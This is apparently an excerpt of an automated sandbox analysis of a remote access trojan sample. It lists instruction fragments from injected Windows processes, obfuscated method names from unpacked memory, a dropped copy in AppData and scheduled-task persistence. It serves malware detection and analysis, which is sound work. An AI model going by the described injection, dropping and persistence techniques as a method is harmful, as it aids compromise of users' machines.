Source: C:\Windows\explorer.exe	Code function: 9_2_0E399B1E push esp; retn 0000h	9_2_0E399B1F
Source: C:\Windows\explorer.exe	Code function: 9_2_0E399B02 push esp; retn 0000h	9_2_0E399B03
Source: C:\Windows\explorer.exe	Code function: 9_2_0E3999B5 push esp; retn 0000h	9_2_0E399AE7
Source: C:\Windows\explorer.exe	Code function: 9_2_104FC9B5 push esp; retn 0000h	9_2_104FCAE7
Source: C:\Windows\explorer.exe	Code function: 9_2_104FCB02 push esp; retn 0000h	9_2_104FCB03
Source: C:\Windows\explorer.exe	Code function: 9_2_104FCB1E push esp; retn 0000h	9_2_104FCB1F
Source: C:\Windows\explorer.exe	Code function: 9_2_106409B5 push esp; retn 0000h	9_2_10640AE7
Source: C:\Windows\explorer.exe	Code function: 9_2_10640B02 push esp; retn 0000h	9_2_10640B03
Source: C:\Windows\explorer.exe	Code function: 9_2_10640B1E push esp; retn 0000h	9_2_10640B1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_004172AA push ebx; ret	13_2_004172AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041D4C5 push eax; ret	13_2_0041D518
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041D57C push eax; ret	13_2_0041D582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041D512 push eax; ret	13_2_0041D518
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041D51B push eax; ret	13_2_0041D582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_00416656 push ecx; retf	13_2_00416669
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0041D7FE push dword ptr [397EB1CEh]; ret	13_2_0041DDB3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0121225F pushad ; ret	13_2_012127F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012127FA pushad ; ret	13_2_012127F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_012409AD push ecx; mov dword ptr [esp], ecx	13_2_012409B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 13_2_0121283D push eax; iretd	13_2_01212858

Source: SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe	Static PE information: section name: .text entropy: 7.977493198205763
Source: KfYvtUBOq.exe.0.dr	Static PE information: section name: .text entropy: 7.977493198205763

Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, Rl2KaIv7OoSKlenJW8.cs	High entropy of concatenated method names: 'hRDu0PaMnH', 'v33uBN4oG7', 'McMuyZ3AuJ', 'QBouv3fNIH', 'YqSuCwAJTi', 'mREurgRsts', 'J1wuMFw8rn', 'orsuDdbftO', 'lBsuILX4GF', 'SWuuhLQj1c'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, y5ode1kjT7vPKqO8Yb.cs	High entropy of concatenated method names: 'LhPby7W7KR', 'HEUbvU6Ltw', 'f4GbVTdXgP', 'XhdbGdt0Mk', 'MGvbJWLS0q', 'AqrbgucZOu', 'QDlb3BsASf', 'SH8bOXUYJ3', 'fGEb4VQEqC', 'xXhb5hQRFM'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, kRTwBN3eOewQaf7vJ4.cs	High entropy of concatenated method names: 'OqLZm3LNM6', 'uGaZu7Z03R', 'VpxZni0sCy', 'uS0nig4Cek', 'DXmnzgMl8Y', 'fbeZ6cvEhK', 'iPYZ9pB11u', 'kfcZls5pug', 'wRRZRKeiaG', 'cfKZQF5uPs'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, Pk7u70NwNEuQxuZOvd.cs	High entropy of concatenated method names: 'lncqA0AsVD', 'vRQqa5Hi6r', 'zVgucyxoTd', 'MDeuJrdTY7', 'o5rugTAbZm', 'IsMu2NXFik', 'Tyxu3VjDCa', 'HLhuOkPUj6', 'ueyuT08u8G', 'N4gu4w5set'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, veEdTsXssh4eIG99SL.cs	High entropy of concatenated method names: 'teyRKhBNNL', 'T2NRmDitSm', 'AsfR77X8Z9', 'GKDRu57fR6', 'sBpRqMXhc9', 'J2YRnwD9X0', 'OIDRZN5dt5', 'JhXRXDrvlC', 'ASyRSAvvhF', 'AmwRtBc5At'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, aQCZCcJuBKwtsEAMbC.cs	High entropy of concatenated method names: 'ulDn1Lb9ha', 'iLmndhFkU7', 'MEOnYmgrw3', 'zlyn0wB96h', 'jYFnBpKGP2', 'FrunatIgSe', 'w7Unv9m0yB', 'Ik2nNmADC3', 'gQQgpRkOag459yTjPXZ', 'bJsbtCklcwDHSARarJ2'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, osCub496meBYvUl8guH.cs	High entropy of concatenated method names: 'c4sIdMWwXk', 'cYaIFDrx1m', 'TMRIY8937r', 'NCTI0v3JPh', 'YBLIAAjhS8', 'pr0IB1jk7T', 'nASIatSqdE', 'TtRIybIWpe', 'gonIvK43Yb', 'U35INjI0Jd'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, vbEq958PxqW1DAqw3H.cs	High entropy of concatenated method names: 'GrbDmHsK5i', 'lR5D72xwTF', 'GgfDuiqVpD', 'KQmDq5gEjU', 'bCQDnECB4D', 'aaWDZqIPZn', 'M92DXd1tW1', 'OaTDSS3o72', 'pkyDtVBWDC', 'HWXDU8S4G4'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, k9bExYlAtUDXGnAaNH.cs	High entropy of concatenated method names: 'APFYcv7Sa', 'Hqy0ZcQlm', 'IHxB6sNpH', 'ox0aM0Ihm', 'LdtvFkLpk', 'MSFNy1rrI', 'bNYXFJZIP2vi8iqWtw', 'ywSe6XrwcchqYnI0TN', 'oVkD36lBn', 'bt9hDfAKF'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, VqLmSH7RgWutvICVLi.cs	High entropy of concatenated method names: 'Dispose', 'qWZ9jHKGhY', 'Rj9lGgQFmo', 'mf833dbNJi', 'Ipb9iEq95P', 'SqW9z1DAqw', 'ProcessDialogKey', 'LH7l6Z55u8', 'nyfl9NBIrR', 'auMllUfRvr'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, NlIU2cH69ja9orLXPY.cs	High entropy of concatenated method names: 'uqNC4ihfJU', 'cU9CLBaYtG', 'Ya1CHDGDfn', 'sdeCWgjndO', 'XnHCG1p6wG', 'pKyCcWyMea', 'byuCJ8smxZ', 'L9tCgKwVoI', 'XynC2wiQKq', 'JhIC3HbUH8'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, nSqupc9RcXrL7kCSMd6.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KaShH8is3H', 'Eb3hW590A1', 'NA8hxljjek', 'XxVhwtXOxK', 'lUAhsXuwWK', 'U7ThoKQo6Z', 'tPdhPxUa6X'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, Rqu2dhxlCKkB7Q1Rjt.cs	High entropy of concatenated method names: 'ToString', 'h3jr5oynwX', 'UvPrGQVyel', 'kBCrcQEaKO', 'UhYrJ7vYLa', 'UbKrgtsx7A', 'soTr2A0Ktb', 'UlPr3MulmH', 'AhPrOIOMyd', 'gQwrTnjEM0'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, mfRvrEiV6LkHavWeTs.cs	High entropy of concatenated method names: 'nG0I9hyZnM', 'vwyIR4wei4', 'lvtIQLDPwo', 'HMaImurevG', 'AvkI7A8gTy', 'YJ8Iq58naS', 'EooInVCg0e', 'urqDPn5AS2', 'b86D81xdus', 'qTIDjeHRf4'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, r0BndIovQnfinH7bOK.cs	High entropy of concatenated method names: 'jrOM8JCQGQ', 'NIVMiBgEmd', 'mVbD6DQHZK', 'Dg6D98fTKU', 'fl4M5rLKJ3', 'R9gMLjUN6w', 'j6WMkCqpsx', 'kaYMHV476h', 'GFMMWgR49r', 'wNRMxchuDL'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, O44hq2QsnAk4t8sf0X.cs	High entropy of concatenated method names: 'zPR9Zy15U5', 'bQX9Xx5oVX', 's7O9toSKle', 'iJW9U8Lk7u', 'gZO9CvdRPU', 'CQK9rh22uq', 'NgAo9PCL2HTB25xchN', 'X5s0ttD1PWP4ndmijG', 'VQw997MlDV', 'Mtx9RXC3Zt'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, Ip8Rabzwsc1PuY1SXs.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gY9IbXWDQq', 'n5MICsGe6Z', 'dj9Ir75kNx', 'dwKIMSOOky', 'gPPIDvReln', 'wF0II4JhUs', 'H7YIhpq8sK'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, cPUaQKVh22uqMAgfdU.cs	High entropy of concatenated method names: 'njanKy8rKH', 'tI8n750rgr', 'oEsnqXsbwb', 'xL2nZewesL', 'cIRnXc7tmb', 'EWVqs7DFC9', 'fDKqoYSMsY', 'KGLqP5XEiw', 'dxRq86fRi1', 'qCfqj8jo3V'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, gZ55u8jUyfNBIrR6uM.cs	High entropy of concatenated method names: 'KjkDV6c96V', 'HjKDGPh1Iq', 'KcNDc8Rh5h', 'vTSDJBNExn', 'sAnDHqiXOP', 'kQ8DgrWXdS', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, dy15U5y9QXx5oVXGvS.cs	High entropy of concatenated method names: 'WhO7HyV4ns', 'PvI7WKOc2O', 'cbx7xF9Vee', 'vrN7wPCDdL', 'YhA7sSZ1hp', 'k2b7ofxYwU', 'eLP7PKkrrm', 'R1Q78xnXmO', 'd0R7j0sSCP', 'WOB7i3UgcU'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.70d0000.5.raw.unpack, pDACUWT7QZRt25nZDm.cs	High entropy of concatenated method names: 'LZaZdkHNRK', 'oCFZFQWPqM', 'oXZZYQcGrY', 'FXiZ0RYtWL', 'CacZAJDg1R', 'EEgZBFNKRZ', 'vCeZa4YCSu', 'o8cZy2U9gh', 'KX2Zvh9R8G', 'SnSZNKFB14'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, Rl2KaIv7OoSKlenJW8.cs	High entropy of concatenated method names: 'hRDu0PaMnH', 'v33uBN4oG7', 'McMuyZ3AuJ', 'QBouv3fNIH', 'YqSuCwAJTi', 'mREurgRsts', 'J1wuMFw8rn', 'orsuDdbftO', 'lBsuILX4GF', 'SWuuhLQj1c'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, y5ode1kjT7vPKqO8Yb.cs	High entropy of concatenated method names: 'LhPby7W7KR', 'HEUbvU6Ltw', 'f4GbVTdXgP', 'XhdbGdt0Mk', 'MGvbJWLS0q', 'AqrbgucZOu', 'QDlb3BsASf', 'SH8bOXUYJ3', 'fGEb4VQEqC', 'xXhb5hQRFM'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, kRTwBN3eOewQaf7vJ4.cs	High entropy of concatenated method names: 'OqLZm3LNM6', 'uGaZu7Z03R', 'VpxZni0sCy', 'uS0nig4Cek', 'DXmnzgMl8Y', 'fbeZ6cvEhK', 'iPYZ9pB11u', 'kfcZls5pug', 'wRRZRKeiaG', 'cfKZQF5uPs'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, Pk7u70NwNEuQxuZOvd.cs	High entropy of concatenated method names: 'lncqA0AsVD', 'vRQqa5Hi6r', 'zVgucyxoTd', 'MDeuJrdTY7', 'o5rugTAbZm', 'IsMu2NXFik', 'Tyxu3VjDCa', 'HLhuOkPUj6', 'ueyuT08u8G', 'N4gu4w5set'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, veEdTsXssh4eIG99SL.cs	High entropy of concatenated method names: 'teyRKhBNNL', 'T2NRmDitSm', 'AsfR77X8Z9', 'GKDRu57fR6', 'sBpRqMXhc9', 'J2YRnwD9X0', 'OIDRZN5dt5', 'JhXRXDrvlC', 'ASyRSAvvhF', 'AmwRtBc5At'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, aQCZCcJuBKwtsEAMbC.cs	High entropy of concatenated method names: 'ulDn1Lb9ha', 'iLmndhFkU7', 'MEOnYmgrw3', 'zlyn0wB96h', 'jYFnBpKGP2', 'FrunatIgSe', 'w7Unv9m0yB', 'Ik2nNmADC3', 'gQQgpRkOag459yTjPXZ', 'bJsbtCklcwDHSARarJ2'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, osCub496meBYvUl8guH.cs	High entropy of concatenated method names: 'c4sIdMWwXk', 'cYaIFDrx1m', 'TMRIY8937r', 'NCTI0v3JPh', 'YBLIAAjhS8', 'pr0IB1jk7T', 'nASIatSqdE', 'TtRIybIWpe', 'gonIvK43Yb', 'U35INjI0Jd'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, vbEq958PxqW1DAqw3H.cs	High entropy of concatenated method names: 'GrbDmHsK5i', 'lR5D72xwTF', 'GgfDuiqVpD', 'KQmDq5gEjU', 'bCQDnECB4D', 'aaWDZqIPZn', 'M92DXd1tW1', 'OaTDSS3o72', 'pkyDtVBWDC', 'HWXDU8S4G4'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, k9bExYlAtUDXGnAaNH.cs	High entropy of concatenated method names: 'APFYcv7Sa', 'Hqy0ZcQlm', 'IHxB6sNpH', 'ox0aM0Ihm', 'LdtvFkLpk', 'MSFNy1rrI', 'bNYXFJZIP2vi8iqWtw', 'ywSe6XrwcchqYnI0TN', 'oVkD36lBn', 'bt9hDfAKF'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, VqLmSH7RgWutvICVLi.cs	High entropy of concatenated method names: 'Dispose', 'qWZ9jHKGhY', 'Rj9lGgQFmo', 'mf833dbNJi', 'Ipb9iEq95P', 'SqW9z1DAqw', 'ProcessDialogKey', 'LH7l6Z55u8', 'nyfl9NBIrR', 'auMllUfRvr'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, NlIU2cH69ja9orLXPY.cs	High entropy of concatenated method names: 'uqNC4ihfJU', 'cU9CLBaYtG', 'Ya1CHDGDfn', 'sdeCWgjndO', 'XnHCG1p6wG', 'pKyCcWyMea', 'byuCJ8smxZ', 'L9tCgKwVoI', 'XynC2wiQKq', 'JhIC3HbUH8'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, nSqupc9RcXrL7kCSMd6.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KaShH8is3H', 'Eb3hW590A1', 'NA8hxljjek', 'XxVhwtXOxK', 'lUAhsXuwWK', 'U7ThoKQo6Z', 'tPdhPxUa6X'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, Rqu2dhxlCKkB7Q1Rjt.cs	High entropy of concatenated method names: 'ToString', 'h3jr5oynwX', 'UvPrGQVyel', 'kBCrcQEaKO', 'UhYrJ7vYLa', 'UbKrgtsx7A', 'soTr2A0Ktb', 'UlPr3MulmH', 'AhPrOIOMyd', 'gQwrTnjEM0'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, mfRvrEiV6LkHavWeTs.cs	High entropy of concatenated method names: 'nG0I9hyZnM', 'vwyIR4wei4', 'lvtIQLDPwo', 'HMaImurevG', 'AvkI7A8gTy', 'YJ8Iq58naS', 'EooInVCg0e', 'urqDPn5AS2', 'b86D81xdus', 'qTIDjeHRf4'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, r0BndIovQnfinH7bOK.cs	High entropy of concatenated method names: 'jrOM8JCQGQ', 'NIVMiBgEmd', 'mVbD6DQHZK', 'Dg6D98fTKU', 'fl4M5rLKJ3', 'R9gMLjUN6w', 'j6WMkCqpsx', 'kaYMHV476h', 'GFMMWgR49r', 'wNRMxchuDL'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, O44hq2QsnAk4t8sf0X.cs	High entropy of concatenated method names: 'zPR9Zy15U5', 'bQX9Xx5oVX', 's7O9toSKle', 'iJW9U8Lk7u', 'gZO9CvdRPU', 'CQK9rh22uq', 'NgAo9PCL2HTB25xchN', 'X5s0ttD1PWP4ndmijG', 'VQw997MlDV', 'Mtx9RXC3Zt'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, Ip8Rabzwsc1PuY1SXs.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gY9IbXWDQq', 'n5MICsGe6Z', 'dj9Ir75kNx', 'dwKIMSOOky', 'gPPIDvReln', 'wF0II4JhUs', 'H7YIhpq8sK'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, cPUaQKVh22uqMAgfdU.cs	High entropy of concatenated method names: 'njanKy8rKH', 'tI8n750rgr', 'oEsnqXsbwb', 'xL2nZewesL', 'cIRnXc7tmb', 'EWVqs7DFC9', 'fDKqoYSMsY', 'KGLqP5XEiw', 'dxRq86fRi1', 'qCfqj8jo3V'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, gZ55u8jUyfNBIrR6uM.cs	High entropy of concatenated method names: 'KjkDV6c96V', 'HjKDGPh1Iq', 'KcNDc8Rh5h', 'vTSDJBNExn', 'sAnDHqiXOP', 'kQ8DgrWXdS', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, dy15U5y9QXx5oVXGvS.cs	High entropy of concatenated method names: 'WhO7HyV4ns', 'PvI7WKOc2O', 'cbx7xF9Vee', 'vrN7wPCDdL', 'YhA7sSZ1hp', 'k2b7ofxYwU', 'eLP7PKkrrm', 'R1Q78xnXmO', 'd0R7j0sSCP', 'WOB7i3UgcU'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.4150a80.1.raw.unpack, pDACUWT7QZRt25nZDm.cs	High entropy of concatenated method names: 'LZaZdkHNRK', 'oCFZFQWPqM', 'oXZZYQcGrY', 'FXiZ0RYtWL', 'CacZAJDg1R', 'EEgZBFNKRZ', 'vCeZa4YCSu', 'o8cZy2U9gh', 'KX2Zvh9R8G', 'SnSZNKFB14'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, Rl2KaIv7OoSKlenJW8.cs	High entropy of concatenated method names: 'hRDu0PaMnH', 'v33uBN4oG7', 'McMuyZ3AuJ', 'QBouv3fNIH', 'YqSuCwAJTi', 'mREurgRsts', 'J1wuMFw8rn', 'orsuDdbftO', 'lBsuILX4GF', 'SWuuhLQj1c'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, y5ode1kjT7vPKqO8Yb.cs	High entropy of concatenated method names: 'LhPby7W7KR', 'HEUbvU6Ltw', 'f4GbVTdXgP', 'XhdbGdt0Mk', 'MGvbJWLS0q', 'AqrbgucZOu', 'QDlb3BsASf', 'SH8bOXUYJ3', 'fGEb4VQEqC', 'xXhb5hQRFM'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, kRTwBN3eOewQaf7vJ4.cs	High entropy of concatenated method names: 'OqLZm3LNM6', 'uGaZu7Z03R', 'VpxZni0sCy', 'uS0nig4Cek', 'DXmnzgMl8Y', 'fbeZ6cvEhK', 'iPYZ9pB11u', 'kfcZls5pug', 'wRRZRKeiaG', 'cfKZQF5uPs'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, Pk7u70NwNEuQxuZOvd.cs	High entropy of concatenated method names: 'lncqA0AsVD', 'vRQqa5Hi6r', 'zVgucyxoTd', 'MDeuJrdTY7', 'o5rugTAbZm', 'IsMu2NXFik', 'Tyxu3VjDCa', 'HLhuOkPUj6', 'ueyuT08u8G', 'N4gu4w5set'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, veEdTsXssh4eIG99SL.cs	High entropy of concatenated method names: 'teyRKhBNNL', 'T2NRmDitSm', 'AsfR77X8Z9', 'GKDRu57fR6', 'sBpRqMXhc9', 'J2YRnwD9X0', 'OIDRZN5dt5', 'JhXRXDrvlC', 'ASyRSAvvhF', 'AmwRtBc5At'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, aQCZCcJuBKwtsEAMbC.cs	High entropy of concatenated method names: 'ulDn1Lb9ha', 'iLmndhFkU7', 'MEOnYmgrw3', 'zlyn0wB96h', 'jYFnBpKGP2', 'FrunatIgSe', 'w7Unv9m0yB', 'Ik2nNmADC3', 'gQQgpRkOag459yTjPXZ', 'bJsbtCklcwDHSARarJ2'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, osCub496meBYvUl8guH.cs	High entropy of concatenated method names: 'c4sIdMWwXk', 'cYaIFDrx1m', 'TMRIY8937r', 'NCTI0v3JPh', 'YBLIAAjhS8', 'pr0IB1jk7T', 'nASIatSqdE', 'TtRIybIWpe', 'gonIvK43Yb', 'U35INjI0Jd'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, vbEq958PxqW1DAqw3H.cs	High entropy of concatenated method names: 'GrbDmHsK5i', 'lR5D72xwTF', 'GgfDuiqVpD', 'KQmDq5gEjU', 'bCQDnECB4D', 'aaWDZqIPZn', 'M92DXd1tW1', 'OaTDSS3o72', 'pkyDtVBWDC', 'HWXDU8S4G4'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, k9bExYlAtUDXGnAaNH.cs	High entropy of concatenated method names: 'APFYcv7Sa', 'Hqy0ZcQlm', 'IHxB6sNpH', 'ox0aM0Ihm', 'LdtvFkLpk', 'MSFNy1rrI', 'bNYXFJZIP2vi8iqWtw', 'ywSe6XrwcchqYnI0TN', 'oVkD36lBn', 'bt9hDfAKF'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, VqLmSH7RgWutvICVLi.cs	High entropy of concatenated method names: 'Dispose', 'qWZ9jHKGhY', 'Rj9lGgQFmo', 'mf833dbNJi', 'Ipb9iEq95P', 'SqW9z1DAqw', 'ProcessDialogKey', 'LH7l6Z55u8', 'nyfl9NBIrR', 'auMllUfRvr'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, NlIU2cH69ja9orLXPY.cs	High entropy of concatenated method names: 'uqNC4ihfJU', 'cU9CLBaYtG', 'Ya1CHDGDfn', 'sdeCWgjndO', 'XnHCG1p6wG', 'pKyCcWyMea', 'byuCJ8smxZ', 'L9tCgKwVoI', 'XynC2wiQKq', 'JhIC3HbUH8'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, nSqupc9RcXrL7kCSMd6.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'KaShH8is3H', 'Eb3hW590A1', 'NA8hxljjek', 'XxVhwtXOxK', 'lUAhsXuwWK', 'U7ThoKQo6Z', 'tPdhPxUa6X'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, Rqu2dhxlCKkB7Q1Rjt.cs	High entropy of concatenated method names: 'ToString', 'h3jr5oynwX', 'UvPrGQVyel', 'kBCrcQEaKO', 'UhYrJ7vYLa', 'UbKrgtsx7A', 'soTr2A0Ktb', 'UlPr3MulmH', 'AhPrOIOMyd', 'gQwrTnjEM0'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, mfRvrEiV6LkHavWeTs.cs	High entropy of concatenated method names: 'nG0I9hyZnM', 'vwyIR4wei4', 'lvtIQLDPwo', 'HMaImurevG', 'AvkI7A8gTy', 'YJ8Iq58naS', 'EooInVCg0e', 'urqDPn5AS2', 'b86D81xdus', 'qTIDjeHRf4'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, r0BndIovQnfinH7bOK.cs	High entropy of concatenated method names: 'jrOM8JCQGQ', 'NIVMiBgEmd', 'mVbD6DQHZK', 'Dg6D98fTKU', 'fl4M5rLKJ3', 'R9gMLjUN6w', 'j6WMkCqpsx', 'kaYMHV476h', 'GFMMWgR49r', 'wNRMxchuDL'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, O44hq2QsnAk4t8sf0X.cs	High entropy of concatenated method names: 'zPR9Zy15U5', 'bQX9Xx5oVX', 's7O9toSKle', 'iJW9U8Lk7u', 'gZO9CvdRPU', 'CQK9rh22uq', 'NgAo9PCL2HTB25xchN', 'X5s0ttD1PWP4ndmijG', 'VQw997MlDV', 'Mtx9RXC3Zt'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, Ip8Rabzwsc1PuY1SXs.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gY9IbXWDQq', 'n5MICsGe6Z', 'dj9Ir75kNx', 'dwKIMSOOky', 'gPPIDvReln', 'wF0II4JhUs', 'H7YIhpq8sK'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, cPUaQKVh22uqMAgfdU.cs	High entropy of concatenated method names: 'njanKy8rKH', 'tI8n750rgr', 'oEsnqXsbwb', 'xL2nZewesL', 'cIRnXc7tmb', 'EWVqs7DFC9', 'fDKqoYSMsY', 'KGLqP5XEiw', 'dxRq86fRi1', 'qCfqj8jo3V'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, gZ55u8jUyfNBIrR6uM.cs	High entropy of concatenated method names: 'KjkDV6c96V', 'HjKDGPh1Iq', 'KcNDc8Rh5h', 'vTSDJBNExn', 'sAnDHqiXOP', 'kQ8DgrWXdS', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, dy15U5y9QXx5oVXGvS.cs	High entropy of concatenated method names: 'WhO7HyV4ns', 'PvI7WKOc2O', 'cbx7xF9Vee', 'vrN7wPCDdL', 'YhA7sSZ1hp', 'k2b7ofxYwU', 'eLP7PKkrrm', 'R1Q78xnXmO', 'd0R7j0sSCP', 'WOB7i3UgcU'
Source: 0.2.SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe.40e0c60.2.raw.unpack, pDACUWT7QZRt25nZDm.cs	High entropy of concatenated method names: 'LZaZdkHNRK', 'oCFZFQWPqM', 'oXZZYQcGrY', 'FXiZ0RYtWL', 'CacZAJDg1R', 'EEgZBFNKRZ', 'vCeZa4YCSu', 'o8cZy2U9gh', 'KX2Zvh9R8G', 'SnSZNKFB14'

Drops PE files

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

File created: C:\Users\user\AppData\Roaming\KfYvtUBOq.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.11894.20893.exe

